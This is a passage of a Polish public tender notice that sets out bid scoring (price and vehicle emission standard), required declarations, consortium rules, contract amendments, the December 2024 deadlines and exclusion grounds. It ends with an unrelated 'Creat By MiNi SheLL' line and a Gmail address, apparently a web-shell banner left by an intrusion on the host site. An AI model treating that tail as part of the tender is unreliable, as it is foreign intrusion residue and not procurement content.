Gdzie: <br/>PC – ilość punktów przyznanych Wykonawcy w kryterium cena brutto zamówienia, <br/>CR– ilość punktów przyznanych Wykonawcy w kryterium „DYSPONOWANIE POJAZDAMI <br/>DO ŚWIADCZENIA USŁUGI O OKREŚLONEJ NORMIE EMISJI SPALIN” <br/>Łączna ilość punktów oferty stanowi sumę ilości punktów przyznanych w kryterium „CENA” oraz ilości punktów przyznanych w kryterium „DYSPONOWANIE POJAZDAMI <br/>DO ŚWIADCZENIA USŁUGI O OKREŚLONEJ NORMIE EMISJI SPALIN” <br/>Oferta, która otrzyma największą łączną ilość punktów zostanie uznana za najkorzystniejszą. Pozostałe oferty zostaną sklasyfikowane zgodnie z uzyskaną łączną ilością punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> aspekty środowiskowe, w tym efektywność energetyczna przedmiotu zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">DYSPONOWANIE POJAZDAMI DO ŚWIADCZENIA USŁUGI O OKREŚLONEJ NORMIE EMISJI SPALIN</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 19.5.1	Formularz ofertowy - wg wzoru stanowiącego załącznik nr 1 do SWZ, <br/>19.5.2	Oświadczenie o niepodleganiu wykluczeniu - wg wzoru stanowiącego załącznik nr 2 do SWZ, <br/>19.5.3	OŚWIADCZENIE wykonawców wspólnie ubiegających się o udzielenie zamówienia z którego wynika, które dostawy lub usługi wykonają poszczególni wykonawcy; wg wzoru stanowiącego załącznik nr 3 do SWZ (jeżeli dotyczy), <br/>19.5.4	Pełnomocnictwo lub inny dokument potwierdzający umocowanie <br/>do reprezentowania wykonawcy - jeżeli w imieniu wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o których mowa w ppkt 19.7.2. <br/>Warunek ten dotyczy również odpowiednio osoby działającej w imieniu wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego oraz podwykonawców. Pełnomocnictwo to musi w swej treści jednoznacznie wskazywać uprawnienie do podpisania oferty. <br/>19.5.5	Zastrzeżenie tajemnicy przedsiębiorstwa (jeżeli dotyczy). <br/>19.5.6	WYKAZ ROZWIĄZAŃ RÓWNOWAŻNYCH wykonawca załącza do oferty wykaz rozwiązań równoważnych z jego opisem lub normami (jeżeli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W przypadku Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia publicznego oferta przedstawiona przez dwóch lub więcej Wykonawców (współpartnerów)<br/>wchodzących w skład konsorcjum lub spółki cywilnej musi być przedstawiona, jako jedna oferta, od jednego podmiotu i<br/>spełniać następujące wymagania:<br/>1) Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika (lidera) do reprezentowania ich w<br/>postępowaniu albo do reprezentowania ich<br/>w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego. Umocowanie należy przedłożyć<br/>wraz z ofertą – treść pełnomocnictwa powinna dokładnie określać zakres umocowania,<br/>2) wszelka korespondencja będzie prowadzona przez zamawiającego wyłącznie<br/>z pełnomocnikiem (liderem),<br/>3) jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, zostanie wybrana,<br/>zamawiający zastrzega możliwość żądania przed zawarciem umowy w sprawie zamówienia publicznego, przedłożenia<br/>umowy regulującej współpracę tych Wykonawców,<br/>4) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia i dokumenty<br/>potwierdzające brak podstaw do wykluczenia<br/>z postępowania oraz spełnianie warunków udziału w zakresie, w jakim każdy<br/>z wykonawców wykazuje spełnianie warunków udziału w postępowaniu składa każdy z Wykonawców wspólnie ubiegających<br/>się o zamówienie,<br/>5) wypełniając formularz oferty, jak również inne dokumenty powołujące<br/>się na „Wykonawcę” należy wpisać dane dotyczące wszystkich współpartnerów, a nie ich pełnomocnika - lidera lub jednego<br/>ze współpartnerów,<br/>6) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które<br/>roboty budowlane lub dostawy lub usługi wykonają poszczególni wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 26.1. Projektowane postanowienia umowy stanowią załącznik nr 4 do SWZ. <br/>Złożenie oferty jest jednoznaczne z akceptacją przez wykonawcę projektowanych postanowień umowy. <br/>26.2. Zmiana postanowień umowy może nastąpić za zgodą obu stron wyrażoną na piśmie, w formie aneksu do niniejszej umowy, pod rygorem nieważności takiej zmiany. Zmiany nie mogą naruszać postanowień zawartych w art. 455 ust. 1 ustawy Prawo zamówień publicznych. Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454 - 455 p.z.p. oraz wskazanym w Projektowanych postanowieniach umowy stanowiącym Załącznik nr 4 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-11 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/jaroslaw</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-11 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-01-09</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Tajemnica przedsiębiorstwa:<br/>Protokół, oferty oraz wszelkie oświadczenia i zaświadczenia składane w postępowaniu o zamówienie publiczne są jawne.<br/>Jeśli oferta zawiera informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu ustawy z dnia 16 kwietnia 1993 r.<br/>o zwalczaniu nieuczciwej konkurencji, Wykonawca powinien nie później niż w terminie składania ofert, zastrzec, że nie<br/>mogą one być udostępnione oraz wykazać,<br/>iż zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa. Wykonawca, w celu utrzymania w poufności tych informacji,<br/>powinien przekazać je w wydzielonym<br/>i odpowiednio oznaczonym pliku. Zamawiający udostępni na wniosek zainteresowanego jawną część dokumentacji.<br/>Zastrzeżenie informacji, które nie stanowią tajemnicy przedsiębiorstwa<br/>w rozumieniu ustawy o zwalczaniu nieuczciwej konkurencji będzie traktowane, jako bezskuteczne i skutkować będzie ich<br/>odtajnieniem.<br/>Podstawy wykluczenia z postępowania, o których mowa w art. 108 ust. 1 p.z.p.<br/>i art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach<br/>w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego<br/>(obligatoryjne) oraz podstawy wykluczenia, o których mowa w art. 109 p.z.p. (fakultatywne).<br/>1. Z postępowania o udzielenie zamówienia wyklucza się Wykonawców, w stosunku<br/>do których zachodzi którakolwiek z okoliczności wskazanych:<br/>1) w art. 108 ust. 1 ustawy p.z.p.,<br/>2) w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach<br/>w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego - przez<br/>okres trwania okoliczności określonych w tym przepisie,<br/>3) Zamawiający nie przewiduje wykluczenia wykonawcy na postawie art. 109 ust. 1 ustawy p.z.p.

Creat By MiNi SheLL
Email: jattceo@gmail.com